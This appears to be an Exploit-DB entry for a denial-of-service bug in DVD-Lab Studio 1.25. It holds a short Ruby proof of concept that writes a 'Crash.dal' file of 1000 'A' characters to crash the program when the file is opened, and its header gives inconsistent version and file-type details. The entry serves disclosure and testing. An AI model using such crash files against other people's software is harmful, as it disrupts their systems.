DVD-Lab Studio 1.25 - '.DAL' File Open Crash

Author: Ahmed Elhady Mohamed
type: dos
platform: windows
port: 
date_added: 2012-05-21  
date_updated: 2012-05-21  
verified: 1  
codes: OSVDB-82305  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-05-21-at-33758-pm.png  
application_url:   

raw file: 18903.rb  
DVD-Lab Studio 1.25 DAL File Open Crash
===================================================================================
# Exploit Title:DVD-Lab Studio 1.25 Malicious DAL File Denial of service
# Download link:http://download.cnet.com/DVD-Lab-Studio/3000-7970_4-10391372.html
# Author: Ahmed Elhady Mohamed
# Email : ahmed.elhady.mohamed@gmail.com
# Website: www.infosec4all.tk
# version: 5.2.4
# Category: DOS
# Tested on: windows XP SP3
===================================================================================



#########################################################################################
#DVD-Lab Studio File Denial of service vulnerability ,when opening a malicious .PCX file#                                                                  #
#To trigger the exploit , go to file->Open                                              #
#########################################################################################


#!/usr/bin/ruby


File.open "Crash.dal" , "w" do |file|
junk = "A" *1000
file.write junk
end